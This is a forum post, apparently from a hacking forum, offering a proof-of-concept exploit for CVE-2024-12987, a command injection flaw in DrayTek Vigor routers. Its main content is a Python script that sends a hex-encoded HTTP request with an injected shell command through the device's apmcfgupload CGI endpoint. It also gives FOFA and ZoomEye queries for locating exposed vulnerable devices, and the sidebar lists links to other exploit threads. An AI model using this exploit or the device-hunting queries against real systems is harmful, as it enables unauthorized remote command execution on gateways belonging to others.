CVE-2024-12987: DrayTek Gateways Remote Command Injection
by Aanya - Thursday January 16, 2025 at 12:19 PM
#1
Understand this exploit : https://netsecfish.notion.site/Command-I...ffe29ce18f

POC
import socket import socks def send_http_request(host_ip, host_port, request):     socket.socket = socks.socksocket     try:         with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:             s.settimeout(10)             s.connect((host_ip, host_port))             request = bytes.fromhex(request.decode())             s.sendall(request)             print("HTTP request sent:")             print(request)             response = b""             while True:                 data = s.recv(4096)                 if not data:                     break                 response += data             return response.decode('utf-8', errors='replace')     except Exception as e:         print("An error occurred:", e) if __name__ == "__main__":     host = '<TARGET_IP>'     port = '<TARGET_PORT>'     request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'     response = send_http_request(host, port, request_apmcfgupload_pwd_binary)     print("HTTP response received:")     print(response)


FOFA QUERY :
Quote: app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"
Quote:"excanvas.js" && "lang==\"zh-cn\"" && "detectLang" && server="DWS"
ZOOMEYE QUERY :
Quote: app="DrayTek Vigor 300B broadband router httpd" || app="DrayTek Vigor2960 router httpd"


With Heart @Aanya  :kitten2:
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 65 2,466 07-02-2026, 02:50 AM
Last Post: NyxeraVX
  Cool Remote Patching ETW/Amsi PoC pepeloco 6 2,094 02-08-2026, 07:58 AM
Last Post: zeroday99
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 807 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123



 Users browsing this thread: 1 Guest(s)